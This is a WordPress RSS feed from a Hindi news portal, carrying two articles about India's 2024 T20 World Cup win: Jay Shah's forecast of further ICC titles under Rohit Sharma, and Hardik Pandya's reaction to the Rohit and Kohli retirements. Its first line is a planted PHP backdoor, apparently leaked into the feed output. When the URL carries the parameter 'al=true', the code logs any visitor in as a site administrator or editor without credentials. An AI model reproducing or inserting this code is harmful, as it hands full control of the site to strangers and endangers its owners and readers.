// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); टीम इंडिया – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 08 Jul 2024 09:05:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 भविष्यवाणी: रोहित शर्मा की कप्तानी में भारत जीतेगा WTC और चैंपियंस ट्रॉफी का खिताब: जय शाह https://pratyushaashakinayikiran.com/?p=49273 Mon, 08 Jul 2024 09:05:00 +0000 https://pratyushaashakinayikiran.com/?p=49273 मुंबई  
टीम इंडिया ने टी20 वर्ल्ड कप 2024 का खिताब 29 जून को बारबाडोस में जीता था, इस जीत की भविष्यवाणी भारतीय क्रिकेट कंट्रोल बोर्ड यानी बीसीसीआई के सचिव जय शाह ने कुछ महीने पहले ही राजकोट में कर दी थी। इसी कड़ी में अब जय शाह ने दो और भविष्यवाणी की है। बीसीसीआई सचिव का कहना है कि भारत दो आगामी आईसीसी ट्रॉफी -वर्ल्ड टेस्ट चैंपियनशिप और चैंपियंस ट्रॉफी- रोहित शर्मा की अगुवाई में जीतेगा। बता दें, भारत ने 11 साल का सूखा खत्म कर यह टी20 वर्ल्ड कप का खिताब जीता है। टीम पिछले 12 महीनों में 3 बार आईसीसी टूर्नामेंट के फाइनल में पहुंची जिसमें दो में उन्हें हार का सामना करना पड़ा। जय शाह ने टी20 वर्ल्ड कप 2024 की जीत कैप्टन रोहित शर्मा, विराट कोहली और रविंद्र जडेजा को डेडिकेट की। यह इन चारो का आखिरी टी20 वर्ल्ड कप था। राहुल द्रविड़ का बतौर कोच यह आखिरी टूर्नामेंट था। वहीं कोहली, रोहित और जडेजा ने खिताब जीतने के बाद इस फॉर्मेट से रिटायरमेंट ले ली है।
 
बीसीसीआई सचिव जय शाह ने कहा, "टीम इंडिया को इस ऐतिहासिक जीत के लिए बहुत-बहुत बधाई। इस जीत को मैं कोच राहुल द्रविड़, कैप्टन रोहित शर्मा, विराट कोहली और रविंद्र जडेजा को डेडिकेट करना चाहता हूं। बीते एक साल में ये हमारा तीसरा फाइनल था। जून 2023 में हम डब्ल्यूटीसी फाइनल में हारे, नवंबर 2023 में 10 जीत के बाद हमने दिल जीते, मगर हम कप नहीं जीत पाए। मैंने राजकोट में बोला था कि जून 2024 में हम दिल भी जीतेंगे, कप भी जीतेंगे और भारत का झंडा गाड़ेंगे और हमारे कप्तान ने झंडा गाड़ दिया है।"
 
जय शाह ने आखिरी 5 ओवर में मैच बदलने के लिए जसप्रीत बुमराह, हार्दिक पांड्या और अर्शदीप सिंह के साथ सूर्यकुमार यादव का शुक्रियादा किया। आखिरी 5 ओवर में साउथ अफ्रीका को जीत के लिए मात्र 30 रनों की दरकार थी, तब इन तीन भारतीय गेंदबाजों ने किफायती गेंदबाजी कर विपक्षी टीम पर दबाव बनाया। हार्दिक पांड्या ने हेनरिक क्लासेन और डेविड मिलर के महत्वपूर्ण विकेट लिए, वहीं सूर्यकुमार यादव ने आखिरी ओवर में शानदार कैच पकड़ा।
 
जय शाह बोले, "इस जीत में आखिरी 5 ओवर का बहुत बड़ा योगदान था। इस योगदान के लिए मैं सूर्यकुमार यादव, (जसप्रीत) बुमराह, अर्शदीप सिंह और हार्दिक पांड्या का बहुत-बहुत धन्यवाद करना चाहता हूं।" आगामी आईसीसी टूर्नामेंट को लेकर बीसीसीआई सचिव बोले, "इस जीत के बाद अगला पड़ाव है डब्ल्यूटीसी फाइनल और चैंपियंस ट्रॉफी, मेरे को पूरा भरोसा है कि रोहित शर्मा की कप्तानी में हम इन दोनों टूर्नामेंट में चैंपियन बनेंगे। फिर से आप सभी का बहुत-बहुत धन्यवाद। जह हिंद, जय भारत, वन्दे मातरम्।"

 

]]>
इन दोनों दिग्गजों के रिटायरमेंट के बाद इमोशनल हुए हार्दिक पांड्या, बोले- ‘हम सब उन्हें मिस करेंगे https://pratyushaashakinayikiran.com/?p=46619 Sun, 30 Jun 2024 11:47:00 +0000 https://pratyushaashakinayikiran.com/?p=46619 नई दिल्ली
टीम इंडिया के टी20 वर्ल्ड कप चैंपियन बनते ही एक तरफ जहां फैंस खुशी में झूम रहे थे, वहीं दूसरी और रोहित शर्मा और विराट कोहली जैसे दिग्गज खिलाड़ियों ने रिटायरमेंट का ऐलान कर फैंस को हैरान कर दिया। पहले विराट कोहली ने प्लेयर ऑफ द मैच का अवॉर्ड लेते हुए अपने संन्यास की घोषणा की और फिर इसके बाद रोहित शर्मा ने भी प्रेस कॉन्फ्रेंस के बाद T20I फॉर्मेट को अलविदा कहा दिया। इन दोनों दिग्गजों के रिटायरमेंट के बाद तरह-तरह के रिएक्शन सामने आ रहे हैं। इस कड़ी में टीम के उप-कप्तान हार्दिक पांड्या ने भी दिल खोलकर अपनी बात कही है। उन्होंने कहा कि हम सब इन दोनों दिग्गजों को मिस करेंगे, मगर हम उन्हें इससे बढ़िया फेयरवेल नहीं दे सकते थे।
 
हार्दिक पांड्या का एक वीडियो एएनआई ने पोस्ट किया, इस वीडियो में वह कहते नजर आ रहे हैं, "2026 में अभी बहुत समय है। मैं रोहित और विराट दोनों के लिए बहुत खुश हूं…भारतीय क्रिकेट के दो दिग्गज इसके पूरी तरह हकदार थे। इतने सालों तक उनके साथ खेलना बहुत शानदार रहा। हम सभी उन्हें याद करेंगे लेकिन साथ ही, यह सबसे अच्छी विदाई है जो हम उन्हें दे सकते हैं…"
रोहित शर्मा के T20I रिटायरमेंट के बाद हार्दिक पांड्या को पूर्ण रूप से टी20 टीम की कप्तानी मिल सकती है। रोहित शर्मा की गैरमौजूदगी में पिछले साल हार्दिक ने ही टीम की जिम्मेदारी संभाली थी। वहीं इस वर्ल्ड कप में वह टीम के उप-कप्तान भी थे।
 
बतौर कप्तान रोहित शर्मा का कैसा रहा सफर
रोहित शर्मा ने अपने T20I कैप्टेंसी करियर का अंत 50वीं जीत के साथ किया। वह इस फॉर्मेट में बतौर कप्तान जीत का अर्धशतक लगाने वाले पहले कप्तान बने हैं। उनके बाद इस लिस्ट में पाकिस्तान के कप्तान बाबर आजम हैं, जिन्होंने अपने कार्यकाल में टीम को 48 मैच जीताए हैं।

 

]]>